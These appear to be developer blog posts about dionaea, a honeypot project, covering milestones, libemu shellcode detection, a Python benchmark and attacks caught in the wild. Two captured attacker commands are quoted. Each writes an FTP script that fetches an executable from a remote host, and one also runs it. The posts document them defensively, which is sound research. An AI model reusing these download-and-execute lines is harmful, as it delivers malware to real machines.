We got a new milestone due:

10.08.2009

• thread-pool works

• stream recording works

• shellcode detection using libemu works

• shellcode emulation using libemu works

• compiles on linux&openbsd

An exploit taken from a public repository, run against the software, is detected and emulated.

To shorten things, basically all required points are hit with current svn.

So, given the time we just saved, some words about how it works.

The core functionality in dionaea is written in c, but python is embedded as scripting language and required parts of the c-api are exported to the embedded python, using cython bindings.

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec(“cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 » o &echo get msq16.exe » o”)
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

I did not expect downloading the malware getting a problem, as all information required was available, including host credentials and filename. But, as the ftp service embedded in the malware is still special, it was a problem.
The ftp service is designed to work with the windows ftp client, the windows ftp only provides active ftp, active ftp does not work on nat if the ftp service port is not on default port 21. Apart from that, the ftp service may fail with 6% of all ports.

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
The offer to download something was not that unexpected, we are working hard to get these offers, so we can grab copies of something, but the location was interesting. Obviously they decided to go for a central service to deploy their malware, and to indicate that level of professionalism on first sight, they use(d) a domain.

Hello,

due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.

I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The ’testsuite’ is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.

I tested

• • 2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)
• • 3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_
• • 3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_

To benchmark, I ran the apache benchmark tool ab

ab -n 100000 -c 15 http://localhost:8080/bar